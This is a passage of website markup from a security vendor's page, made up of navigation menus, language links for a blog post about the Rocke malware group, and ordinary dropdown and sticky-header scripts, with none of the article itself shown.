class="margin-bottom margin-small"><a href="/resources/understanding-threat-exposure-management" class="navbar2_column-section-heading is-new w-inline-block"><div class="navbar2_dropdown-heading"><div class="text-size-small text-weight-semibold">What is Threat Exposure Management?<br/></div></div></a></div><div class="margin-bottom margin-small"><a href="/resources/what-is-threat-detection-investigation-and-response" class="navbar2_column-section-heading is-new w-inline-block"><div class="navbar2_dropdown-heading"><div class="text-size-small text-weight-semibold">What is Threat Detection, Investigation, and Response?</div></div></a></div><a href="/resources/evolution-future-of-siem" class="navbar2_column-section-heading is-new w-inline-block"><div class="navbar2_dropdown-heading"><div class="text-size-small text-weight-semibold">The Evolution and Future of SIEM<br/></div></div></a></div></div></div></nav></div><div data-delay="0" data-hover="false" class="navbar-dropdown_link is-new w-dropdown"><div class="navbar-dropdown_toggle w-dropdown-toggle"><div class="text-weight-medium nav-link is-new">Security Frameworks</div><div class="html-embed w-embed"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="18" height="18"><path d="M11.9997 13.1714L16.9495 8.22168L18.3637 9.63589L11.9997 15.9999L5.63574 9.63589L7.04996 8.22168L11.9997 13.1714Z" fill="rgba(0,0,0,1)"></path></svg></div></div><nav class="navbar-dropdown_list w-dropdown-list"><div class="navbar2_dropdown-right-column"><div class="navbar2_column-section"><div><div class="margin-bottom margin-small"><a href="/resources/what-are-stix-taxii" class="navbar2_column-section-heading is-new w-inline-block"><div class="navbar2_dropdown-heading"><div class="text-size-small text-weight-semibold">What Are STIX/TAXII?</div></div></a></div><a href="/resources/what-is-mitre-attack-and-how-is-it-useful" class="navbar2_column-section-heading is-new w-inline-block"><div class="navbar2_dropdown-heading"><div 
class="text-size-small text-weight-semibold">What is MITRE ATTACK?</div></div></a></div></div></div></nav></div><div data-delay="0" data-hover="false" class="navbar-dropdown_link is-new w-dropdown"><div class="navbar-dropdown_toggle w-dropdown-toggle"><div class="text-weight-medium nav-link is-new">Free Tools</div><div class="html-embed w-embed"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="18" height="18"><path d="M11.9997 13.1714L16.9495 8.22168L18.3637 9.63589L11.9997 15.9999L5.63574 9.63589L7.04996 8.22168L11.9997 13.1714Z" fill="rgba(0,0,0,1)"></path></svg></div></div><nav class="navbar-dropdown_list w-dropdown-list"><div class="navbar2_dropdown-right-column"><div class="navbar2_column-section"><div><div class="margin-bottom margin-small"><a href="/resources/staxx" class="navbar2_column-section-heading is-new w-inline-block"><div class="navbar2_dropdown-heading"><div class="text-size-small text-weight-semibold">STAXX<br/></div><p class="text-size-small text-weight-normal">STAXX gives you an easy way to access any STIX/TAXII feed.</p></div></a></div></div></div></div></nav></div></div></div></div></div><div class="navbar_link-partners is-new"><div class="padding-global desktop-version tablet-version navlinks"><div class="container-large desktop-version"><div class="back-button-wrapper"><div data-w-id="0c6e9625-048c-696f-e1ce-466d6ae2c9aa" class="navbar_link-back products"><div class="back-button w-embed"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="18" height="18"><path d="M10.8284 12.0007L15.7782 16.9504L14.364 18.3646L8 12.0007L14.364 5.63672L15.7782 7.05093L10.8284 12.0007Z" fill="rgba(0,0,0,1)"></path></svg></div><div class="text-size-small text-weight-medium">PARTNERS</div></div></div><a href="/partners" class="new_nav_dropdown-full w-inline-block"><div class="new_nav_dropdown-link"><div class="text-size-regular text-weight-semibold">Partners Overview</div><p class="text-size-small text-weight-normal">Anomali is 
dedicated to fostering strong partnerships, ensuring shared success and growth through collaborative innovation and mutual support.</p></div></a><a href="/partners/directory" class="new_nav_dropdown-full is-2 w-inline-block"><div class="new_nav_dropdown-link"><div class="text-size-regular text-weight-semibold">Browse our Partner Directory</div></div></a><div class="navbar_link-products-dropdowns"><div data-delay="0" data-hover="false" class="navbar-dropdown_link is-new w-dropdown"><div class="navbar-dropdown_toggle w-dropdown-toggle"><div class="text-weight-medium nav-link is-new">Channel Partners</div><div class="html-embed w-embed"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="18" height="18"><path d="M11.9997 13.1714L16.9495 8.22168L18.3637 9.63589L11.9997 15.9999L5.63574 9.63589L7.04996 8.22168L11.9997 13.1714Z" fill="rgba(0,0,0,1)"></path></svg></div></div><nav class="navbar-dropdown_list w-dropdown-list"><div class="navbar2_dropdown-right-column"><div class="navbar2_column-section"><div><div class="margin-bottom margin-small"><p class="text-size-small text-weight-normal">We help MSSPs, resellers, system integrators, and distributors enable their customers with accelerated investigation and response, improved visibility, and automated SOC operations.<br/></p></div><div class="margin-bottom margin-small"><a href="/partners/channel" class="navbar2_column-section-heading is-new w-inline-block"><div class="navbar2_dropdown-heading"><div class="text-size-small text-weight-semibold">Learn More</div></div></a></div><div class="margin-bottom margin-small"><a href="/partners/channel/apply" class="navbar2_column-section-heading is-new w-inline-block"><div class="navbar2_dropdown-heading"><div class="text-size-small text-weight-semibold">Become a Channel Partner<br/></div></div></a></div><a href="https://anomali.channeltivity.com/Login" target="_blank" class="navbar2_column-section-heading is-new w-inline-block"><div 
class="navbar2_dropdown-heading"><div class="text-size-small text-weight-semibold">Visit the Partner Portal<br/></div></div></a></div></div></div></nav></div><div data-delay="0" data-hover="false" class="navbar-dropdown_link is-new w-dropdown"><div class="navbar-dropdown_toggle w-dropdown-toggle"><div class="text-weight-medium nav-link is-new">Technology Alliance Partners</div><div class="html-embed w-embed"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="18" height="18"><path d="M11.9997 13.1714L16.9495 8.22168L18.3637 9.63589L11.9997 15.9999L5.63574 9.63589L7.04996 8.22168L11.9997 13.1714Z" fill="rgba(0,0,0,1)"></path></svg></div></div><nav class="navbar-dropdown_list w-dropdown-list"><div class="navbar2_dropdown-right-column"><div class="navbar2_column-section"><div><div class="margin-bottom margin-small"><p class="text-size-small text-weight-normal">We offer a robust set of APIs and Sales Development Kits (SDKs) to seamlessly integrate with other technologies and help deliver better business outcomes for customers.<br/></p></div><div class="margin-bottom margin-small"><a href="/partners/technology" class="navbar2_column-section-heading is-new w-inline-block"><div class="navbar2_dropdown-heading"><div class="text-size-small text-weight-semibold">Learn More</div></div></a></div><a href="/partners/technology/apply" class="navbar2_column-section-heading is-new w-inline-block"><div class="navbar2_dropdown-heading"><div class="text-size-small text-weight-semibold">Become a Technology Alliance Partner</div></div></a></div></div></div></nav></div><div data-delay="0" data-hover="false" class="navbar-dropdown_link is-new w-dropdown"><div class="navbar-dropdown_toggle w-dropdown-toggle"><div class="text-weight-medium nav-link is-new">Threat Intel Sharing</div><div class="html-embed w-embed"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="18" height="18"><path d="M11.9997 13.1714L16.9495 8.22168L18.3637 9.63589L11.9997 15.9999L5.63574 
9.63589L7.04996 8.22168L11.9997 13.1714Z" fill="rgba(0,0,0,1)"></path></svg></div></div><nav class="navbar-dropdown_list w-dropdown-list"><div class="navbar2_dropdown-right-column"><div class="navbar2_column-section"><div><div class="margin-bottom margin-small"><p class="text-size-small text-weight-normal">We offer the leading global threat sharing platform for ISACs, ISAOs, industry groups, holding companies, and other threat intel sharing communities seeking to power secure collaboration.</p></div><div class="margin-bottom margin-small"><a href="/partners/threat-intel-sharing" class="navbar2_column-section-heading is-new w-inline-block"><div class="navbar2_dropdown-heading"><div class="text-size-small text-weight-semibold">Learn More<br/></div></div></a></div><a href="/partners/threat-intel-sharing/apply" class="navbar2_column-section-heading is-new w-inline-block"><div class="navbar2_dropdown-heading"><div class="text-size-small text-weight-semibold">Become a Threat Intelligence Sharing Partner<br/></div></div></a></div></div></div></nav></div></div></div></div></div><div class="navbar_link-company is-new"><div class="padding-global desktop-version tablet-version navlinks"><div class="container-large desktop-version"><div class="back-button-wrapper"><div data-w-id="0c6e9625-048c-696f-e1ce-466d6ae2ca07" class="navbar_link-back products"><div class="back-button w-embed"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="18" height="18"><path d="M10.8284 12.0007L15.7782 16.9504L14.364 18.3646L8 12.0007L14.364 5.63672L15.7782 7.05093L10.8284 12.0007Z" fill="rgba(0,0,0,1)"></path></svg></div><div class="text-size-small text-weight-medium">COMPANY</div></div></div><a href="/company" class="new_nav_dropdown-full w-inline-block"><div class="new_nav_dropdown-link"><div class="text-size-regular text-weight-semibold">About Us</div><p class="text-size-small text-weight-normal">Anomali is the leader in modernizing security operations with the power of 
analytics, intelligence, automation, and AI to deliver breakthrough levels of visibility, threat detection and response, and cyber exposure management.</p></div></a><a href="/company/leadership" class="new_nav_dropdown-full is-2 w-inline-block"><div class="new_nav_dropdown-link"><div class="text-size-regular text-weight-semibold">Leadership</div></div></a><a href="/company/careers" class="new_nav_dropdown-full is-2 w-inline-block"><div class="new_nav_dropdown-link"><div class="text-size-regular text-weight-semibold">Careers</div></div></a><a href="/press-room" class="new_nav_dropdown-full is-2 w-inline-block"><div class="new_nav_dropdown-link"><div class="text-size-regular text-weight-semibold">Press Room</div></div></a><a href="/company/awards" class="new_nav_dropdown-full is-2 w-inline-block"><div class="new_nav_dropdown-link"><div class="text-size-regular text-weight-semibold">Awards</div></div></a><a href="/company/reviews" class="new_nav_dropdown-full is-2 w-inline-block"><div class="new_nav_dropdown-link"><div class="text-size-regular text-weight-semibold">Reviews</div></div></a><a href="/contact" class="new_nav_dropdown-full is-2 w-inline-block"><div class="new_nav_dropdown-link"><div class="text-size-regular text-weight-semibold">Contact Us</div></div></a><a href="/request-a-demo" class="new_nav_dropdown-full is-2 w-inline-block"><div class="new_nav_dropdown-link"><div class="text-size-regular text-weight-semibold">Schedule a Demo</div></div></a></div></div></div></div></nav></div></div></div></div></div><div class="navbar-sticky navbar3"><div class="padding-global"><div class="container-large"><div data-animation="default" class="navbar padding-bottom-0 tablet-version w-nav" data-easing2="ease" fs-scrolldisable-element="smart-nav" data-easing="ease" data-collapse="medium" data-w-id="0c6e9625-048c-696f-e1ce-466d6ae2ca30" role="banner" data-duration="400"><div class="navbar_wrapper"><div class="navbar_inside-wrapper"><div class="navbar_sticky-wrapper 
navbar3"><div class="navbar3_logo-wrapper"><a href="/" class="w-nav-brand"><img width="200" height="Auto" alt="" src="https://cdn.prod.website-files.com/6453db2ad32b573c40a15c49/6615615b4e92d82289e9b0be_anomali%20logo%20white.svg" loading="lazy" class="navbar3_logo is-new"/></a></div><div class="navbar3_menu"><div data-delay="0" data-hover="false" class="navbar2_menu-item w-dropdown"><div fs-selectcustom-element="label" class="navbar3_link w-dropdown-toggle"><div class="navbar2_link-text"><div class="navbar2_link-text">Products</div><div class="navbar2_menu-arrow w-embed"><svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M13 6L8 11L3 6" stroke="CurrentColor" stroke-width="1.5"/> </svg></div></div></div><nav class="navbar3_link-dropdown w-dropdown-list"><div class="new_nav_dropdown-layout"><div class="new_nav_dropdown-links-list"><a href="/platform" class="new_nav_dropdown-links-item full-link w-inline-block"><div class="new_nav_dropdown-link"><div class="text-size-regular text-weight-semibold">The Anomali Platform</div><p class="text-size-small text-weight-normal">The industry-leading AI-Powered solution elevating your security operations and defense capabilities in one platform. We consolidate your tech stack; give you never before seen speed scale and performance at less cost, empower your team, and help retain them. 
Simply different.</p></div></a><div class="new_nav_dropdown-links-item"><div class="text-size-regular text-weight-semibold">Security Automation</div><div class="new_nav_dropdown-link-wrapoper"><a href="/products/copilot" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">Anomali Copilot</div><p class="text-size-small text-weight-normal">Immediate, correlated insight: Search petabytes of data in seconds.</p></a><a href="#" class="new_nav_dropdown-link hide w-inline-block"><div class="text-size-small text-weight-semibold">Integrator</div><p class="text-size-small text-weight-normal">Automate response: Transform risk insights into real-time protections.</p></a></div></div><div class="new_nav_dropdown-links-item"><div class="text-size-regular text-weight-semibold">Detection and Response</div><div class="new_nav_dropdown-link-wrapoper"><a href="/products/security-analytics" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">Anomali Security Analytics</div><p class="text-size-small text-weight-normal">Big data security analytics: Threat detection across all of your digital assets at a fraction of the cost.</p></a></div></div><div class="new_nav_dropdown-links-item"><div class="text-size-regular text-weight-semibold">Threat Intelligence</div><div class="new_nav_dropdown-link-wrapoper"><a href="/products/threatstream" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">Anomali ThreatStream</div><p class="text-size-small text-weight-normal">The external landscape: From data to insights in minutes.</p></a><a href="#" class="new_nav_dropdown-link hide w-inline-block"><div class="text-size-small text-weight-semibold">Anomali Intelligence Channels</div><p class="text-size-small text-weight-normal">Your curated intelligence: Accelerate your time to protection.</p></a></div></div><a id="w-node-_0c6e9625-048c-696f-e1ce-466d6ae2ca6c-07e133ca" 
href="/siem-consolidation" class="button-v2 is-secondary is-navbar w-button">Navigating the siem storm?</a></div></div></nav></div><div data-delay="0" data-hover="false" class="navbar2_menu-item w-dropdown"><div class="navbar3_link w-dropdown-toggle"><div class="navbar2_link-text"><div class="navbar2_link-text">Marketplace</div><div class="navbar2_menu-arrow w-embed"><svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M13 6L8 11L3 6" stroke="CurrentColor" stroke-width="1.5"/> </svg></div></div></div><nav class="navbar3_link-dropdown w-dropdown-list"><div class="new_nav_dropdown-layout is-75"><div class="new_nav_dropdown-links-list _3-col"><a href="/marketplace" class="new_nav_dropdown-links-item full-link w-inline-block"><div class="new_nav_dropdown-link"><div class="text-size-regular text-weight-semibold">The Anomali Marketplace</div><p class="text-size-small text-weight-normal">A unique cybersecurity marketplace providing instant access to a growing catalog of threat intelligence providers, integration partners, and threat analysis tools.</p></div></a><div class="new_nav_dropdown-links-item"><div class="text-size-regular text-weight-semibold">Marketplace Offerings</div><div class="new_nav_dropdown-link-wrapoper"><a href="/marketplace/threat-intelligence-feeds" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">Threat Intelligence Feeds</div><p class="text-size-small text-weight-normal">Trial and purchase threat intelligence feeds from Anomali partners – find the right intelligence for your organization, industry, geography, threat type, and more.</p></a><a href="/marketplace/threat-analysis-tools" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">Threat Analysis Tools and Enrichments</div><p class="text-size-small text-weight-normal">Gain the tools to pivot quickly from one piece of information to look up other sources of 
data to get a complete picture of a threat – all one click away.</p></a></div></div><div class="new_nav_dropdown-links-item"><div class="text-size-regular text-weight-semibold">For Partners</div><div class="new_nav_dropdown-link-wrapoper"><a href="/marketplace/security-system-partners" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">Security System Partners</div><p class="text-size-small text-weight-normal">Anomali seamlessly integrates with many Security and IT systems to operationalize threat intelligence cost.</p></a><a href="/marketplace" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">Marketplace for Partners</div><p class="text-size-small text-weight-normal">The Anomali Technology Partner Program provides technology partners everything they need to develop innovative and differentiated product and service integrations that complement Anomali’s solution portfolio designed to stop breaches and attackers.</p></a></div></div></div></div></nav></div><div data-delay="0" data-hover="false" class="navbar2_menu-item w-dropdown"><div class="navbar3_link w-dropdown-toggle"><div class="navbar2_link-text"><div class="navbar2_link-text">Resources</div><div class="navbar2_menu-arrow w-embed"><svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M13 6L8 11L3 6" stroke="CurrentColor" stroke-width="1.5"/> </svg></div></div></div><nav class="navbar3_link-dropdown w-dropdown-list"><div class="new_nav_dropdown-layout"><div class="new_nav_dropdown-links-list _5-col"><div class="new_nav_dropdown-links-item full-link"><div class="text-size-regular text-weight-semibold">Libraries</div><div class="new_nav_dropdown-link-wrapoper"><a href="/resources" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">Resources</div><p class="text-size-small text-weight-normal">Upcoming and on-demand webinars, 
brochures and datasheets, industry reports and white papers, case studies, and more.</p></a><a href="/company/events" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">Events</div><p class="text-size-small text-weight-normal">Join Anomali for any of our online or in-person events throughout the year to learn how we can help you achieve your cyber security goals. We'd love to see you online or in-person!</p></a></div></div><div class="new_nav_dropdown-links-item hide"><div class="text-size-regular text-weight-semibold">AI Automation</div><div class="new_nav_dropdown-link-wrapoper"><a href="#" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">What is Copilot?</div></a></div></div><div class="new_nav_dropdown-links-item"><div class="text-size-regular text-weight-semibold">Threat Intelligence</div><div class="new_nav_dropdown-link-wrapoper"><a href="/resources/what-is-threat-intelligence" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">What is Threat Intelligence?</div></a><a href="/resources/sharing-threat-intelligence" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">Threat Intelligence Sharing</div></a><a href="/resources/what-is-a-tip" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">What is a Threat Intelligence Platform?</div></a><a href="/resources/what-is-a-cyber-fusion-center" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">What is a Cyber Fusion Center?</div></a></div></div><div class="new_nav_dropdown-links-item"><div class="text-size-regular text-weight-semibold">Security Analytics</div><div class="new_nav_dropdown-link-wrapoper"><a href="/resources/what-is-security-analytics" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">What is Security 
Analytics?</div></a><a href="/resources/what-is-soar" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">What is SOAR?</div></a><a href="/resources/understanding-threat-exposure-management" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">What is Threat Exposure Management?</div></a><a href="/resources/what-is-threat-detection-investigation-and-response" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">What is Threat Detection, Investigation, and Response?</div></a><a href="/resources/evolution-future-of-siem" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">The Evolution and Future of SIEM</div></a></div></div><div class="new_nav_dropdown-links-item"><div class="text-size-regular text-weight-semibold">Security Frameworks</div><div class="new_nav_dropdown-link-wrapoper"><a href="/resources/what-are-stix-taxii" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">What Are STIX/TAXII?</div></a><a href="/resources/what-is-mitre-attack-and-how-is-it-useful" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">What is MITRE ATTACK?</div></a></div></div><div id="w-node-_0c6e9625-048c-696f-e1ce-466d6ae2cae4-07e133ca" class="new_nav_dropdown-links-item"><div class="text-size-regular text-weight-semibold">Free Tools</div><div class="new_nav_dropdown-link-wrapoper"><a href="/resources/staxx" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">STAXX</div><p class="text-size-small text-weight-normal">STAXX gives you an easy way to access any STIX/TAXII feed.</p></a></div></div></div></div></nav></div><div data-delay="0" data-hover="false" class="navbar2_menu-item w-dropdown"><div class="navbar3_link w-dropdown-toggle"><div class="navbar2_link-text"><div 
class="navbar2_link-text">Partners</div><div class="navbar2_menu-arrow w-embed"><svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M13 6L8 11L3 6" stroke="CurrentColor" stroke-width="1.5"/> </svg></div></div></div><nav class="navbar3_link-dropdown w-dropdown-list"><div class="new_nav_dropdown-layout"><div class="new_nav_dropdown-links-list _4-col"><div class="new_nav_dropdown-links-item full-link"><div class="new_nav_dropdown-link-wrapoper no-header"><a href="/partners" class="new_nav_dropdown-link w-inline-block"><div class="text-size-regular text-weight-semibold">Partners Overview</div><p class="text-size-small text-weight-normal">Anomali is dedicated to fostering strong partnerships, ensuring shared success and growth through collaborative innovation and mutual support.</p></a><a href="/partners/directory" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">Browse our Partner Directory</div></a></div></div><div class="new_nav_dropdown-links-item"><div class="new_nav_dropdown-link-wrapoper no-header"><a href="/partners/channel" class="new_nav_dropdown-link w-inline-block"><div class="text-size-regular text-weight-semibold">Channel Partners</div><p class="text-size-small text-weight-normal">We help MSSPs, resellers, system integrators, and distributors enable their customers with accelerated investigation and response, improved visibility, and automated SOC operations.</p></a><a href="/partners/channel/apply" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">Become a Channel Partner</div></a><a href="https://anomali.channeltivity.com/Login" target="_blank" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">Visit the Partner Portal</div></a></div></div><div id="w-node-_0c6e9625-048c-696f-e1ce-466d6ae2cb0d-07e133ca" class="new_nav_dropdown-links-item"><div 
class="new_nav_dropdown-link-wrapoper no-header"><a href="/partners/technology" class="new_nav_dropdown-link w-inline-block"><div class="text-size-regular text-weight-semibold">Technology Alliance Partners</div><p class="text-size-small text-weight-normal">We offer a robust set of APIs and Sales Development Kits (SDKs) to seamlessly integrate with other technologies and help deliver better business outcomes for customers.</p></a><a href="/partners/technology/apply" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">Become a Technology Alliance Partner</div></a></div></div><div class="new_nav_dropdown-links-item"><div class="new_nav_dropdown-link-wrapoper no-header"><a href="/partners/threat-intel-sharing" class="new_nav_dropdown-link w-inline-block"><div class="text-size-regular text-weight-semibold">Threat Intel Sharing</div><p class="text-size-small text-weight-normal">We offer the leading global threat sharing platform for ISACs, ISAOs, industry groups, holding companies, and other threat intel sharing communities seeking to power secure collaboration.</p></a><a href="/partners/threat-intel-sharing/apply" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">Become a Threat Intelligence Sharing Partner</div></a></div></div></div></div></nav></div><div data-delay="0" data-hover="false" class="navbar2_menu-item w-dropdown"><div class="navbar3_link w-dropdown-toggle"><div class="navbar2_link-text"><div class="navbar2_link-text">Company</div><div class="navbar2_menu-arrow w-embed"><svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M13 6L8 11L3 6" stroke="CurrentColor" stroke-width="1.5"/> </svg></div></div></div><nav class="navbar3_link-dropdown w-dropdown-list"><div class="new_nav_dropdown-layout is-75"><div class="new_nav_dropdown-links-list _3-col"><div class="new_nav_dropdown-links-item"><div 
class="new_nav_dropdown-link-wrapoper no-header"><a href="/company" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">About Us</div><p class="text-size-small text-weight-normal">Anomali is a revolutionary AI-Powered Security Operations Platform that is the first and only solution to bring together security operations and defense capabilities into one proprietary cloud-native big data solution.</p></a><a href="/company/leadership" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">Leadership</div></a><a href="/company/careers" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">Careers</div></a></div></div><div class="new_nav_dropdown-links-item"><div class="new_nav_dropdown-link-wrapoper no-header"><a href="/press-room" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">Press Room</div></a><a href="/company/reviews" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">Reviews</div></a><a href="/company/awards" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">Awards</div></a></div></div><div class="new_nav_dropdown-links-item"><div class="new_nav_dropdown-link-wrapoper no-header"><a href="/contact" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">Contact Us</div></a><a href="/request-a-demo" class="new_nav_dropdown-link w-inline-block"><div class="text-size-small text-weight-semibold">Schedule a Demo</div></a></div></div></div></div></nav></div><div class="button-group"><a href="/request-a-demo" class="button-v2 w-button">Schedule A Demo</a></div><div class="wg-element-wrapper sw5 w-locales-list"><div data-delay="300" data-hover="false" data-w-id="0c6e9625-048c-696f-e1ce-466d6ae2cb4e" class="wg-dropdown-1 w-dropdown"><div class="wg-dd-1-togle 
w-dropdown-toggle"><div class="navbar2_link-text hide">en</div><div class="lang_icon-wrapper"><div class="icon-1x1-regular is-new w-embed"><svg width="100%" height="100%" viewBox="0 0 16 17" fill="none" xmlns="http://www.w3.org/2000/svg"> <g clip-path="url(#clip0_458_3116)"> <path d="M7.96667 15.9668C12.0904 15.9668 15.4333 12.6238 15.4333 8.50011C15.4333 4.37639 12.0904 1.03345 7.96667 1.03345C3.84294 1.03345 0.5 4.37639 0.5 8.50011C0.5 12.6238 3.84294 15.9668 7.96667 15.9668Z" stroke="black" stroke-miterlimit="10"/> <path d="M2.5 13.5133C3.84933 12.164 5.716 11.3267 7.78 11.3267C9.844 11.3267 11.7107 12.164 13.06 13.5133" stroke="black" stroke-miterlimit="10"/> <path d="M13.06 3.48657C11.7107 4.83591 9.844 5.67324 7.78 5.67324C5.716 5.67324 3.84933 4.83591 2.5 3.48657" stroke="black" stroke-miterlimit="10"/> <path d="M7.98833 15.9668C9.3626 15.9668 10.4767 12.6238 10.4767 8.50011C10.4767 4.37639 9.3626 1.03345 7.98833 1.03345C6.61406 1.03345 5.5 4.37639 5.5 8.50011C5.5 12.6238 6.61406 15.9668 7.98833 15.9668Z" stroke="black" stroke-miterlimit="10"/> <path d="M0.5 8.5H15.4333" stroke="black" stroke-miterlimit="10"/> </g> <defs> <clipPath id="clip0_458_3116"> <rect width="16" height="16" fill="white" transform="translate(0 0.5)"/> </clipPath> </defs> </svg></div></div></div><nav data-w-id="0c6e9625-048c-696f-e1ce-466d6ae2cb54" class="wg-dd-1-list w-dropdown-list"><div role="list" class="w-locales-items"><div role="listitem" class="locale w-locales-item"><a hreflang="en" href="/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang" aria-current="page" class="wg-dropdown-1-link w--current">English</a></div><div role="listitem" class="locale w-locales-item"><a hreflang="es" href="/es/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang" class="wg-dropdown-1-link">Español</a></div><div role="listitem" class="locale w-locales-item"><a hreflang="fr-FR" 
href="/fr/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang" class="wg-dropdown-1-link">Français</a></div><div role="listitem" class="locale w-locales-item"><a hreflang="it" href="/it/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang" class="wg-dropdown-1-link">Italiano</a></div></div></nav></div></div></div></div></div></div></div></div></div></div><div class="navbar_script hide w-embed w-script"><script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> <!--Navbar Sticky Style Start--> <style> .navbar2_menu-arrow { transform: rotate(0deg); } body { margin: 0; padding: 0; } .content { height: 2000px; /* Replace with the actual height of your content */ padding: 20px; /* Adjust padding to your design */ } .navbar-sticky { position: sticky; top: 0; z-index: 100; background-color: white; } </style> <!--Navbar Sticky Style End--> <script> $(document).ready(function() { $('.navbar2_dropdown-link').hover( function() { $(this).click(); } ); }); /*Navbar Sticky Start*/ /*var navbar = document.querySelector(".navbar-sticky"); var navbarOffsetTop = navbar.offsetTop; var heightBox = document.querySelector(".height-box"); // Add this line to select the .height-box element window.addEventListener("scroll", function () { if (window.scrollY >= navbarOffsetTop) { navbar.style.position = "fixed"; navbar.style.top = "0"; heightBox.style.display = "block"; // Show the .height-box element } else { navbar.style.position = "relative"; heightBox.style.display = "none"; // Hide the .height-box element } });*/ /*Navbar Sticky End*/ var navbar = document.querySelector('.navbar-sticky'); var navbarOffsetTop = navbar.offsetTop; var heightBox = document.querySelector('.height-box'); window.addEventListener('scroll', function() { if (window.innerWidth >= 992) { if (window.scrollY >= navbarOffsetTop) { navbar.style.position = 'fixed'; navbar.style.top = '0'; heightBox.style.display = 'block'; } else { navbar.style.position = 'relative'; 
heightBox.style.display = 'none'; } } }); </script> <script> document.addEventListener('DOMContentLoaded', function() { var currentlyOpenDropdown = null; var dropdowns = document.querySelectorAll('.navbar2_menu-item'); dropdowns.forEach(function(dropdown) { var arrow = dropdown.querySelector('.navbar2_menu-arrow'); var navbar3Links = dropdown.querySelectorAll('.navbar3_link'); dropdown.addEventListener('click', function(event) { event.stopPropagation(); // Stop event propagation to prevent document click from immediately closing the dropdown if (currentlyOpenDropdown && currentlyOpenDropdown !== dropdown) { var previousArrow = currentlyOpenDropdown.querySelector('.navbar2_menu-arrow'); previousArrow.style.transition = 'transform 0.2s ease'; previousArrow.style.transform = 'rotate(0deg)'; currentlyOpenDropdown.classList.remove('w--open'); toggleFontStyle(currentlyOpenDropdown, false); } dropdown.classList.toggle('w--open'); currentlyOpenDropdown = dropdown; if (dropdown.classList.contains('w--open')) { arrow.style.transition = 'transform 0.2s ease'; arrow.style.transform = 'rotate(180deg)'; toggleFontStyle(dropdown, true); } else { arrow.style.transition = 'transform 0.2s ease'; arrow.style.transform = 'rotate(0deg)'; currentlyOpenDropdown = null; toggleFontStyle(dropdown, false); } }); }); // Event listener to close the dropdown when clicking outside of it document.body.addEventListener('click', function() { if (currentlyOpenDropdown) { var arrow = currentlyOpenDropdown.querySelector('.navbar2_menu-arrow'); arrow.style.transition = 'transform 0.2s ease'; arrow.style.transform = 'rotate(0deg)'; currentlyOpenDropdown.classList.remove('w--open'); toggleFontStyle(currentlyOpenDropdown, false); currentlyOpenDropdown = null; } }); function toggleFontStyle(dropdown, isOpen) { var navbar3Links = dropdown.querySelectorAll('.navbar3_link'); navbar3Links.forEach(function(link) { link.style.transition = 'color 0.2s ease, font-weight 0.2s ease'; // Add transition for color and 
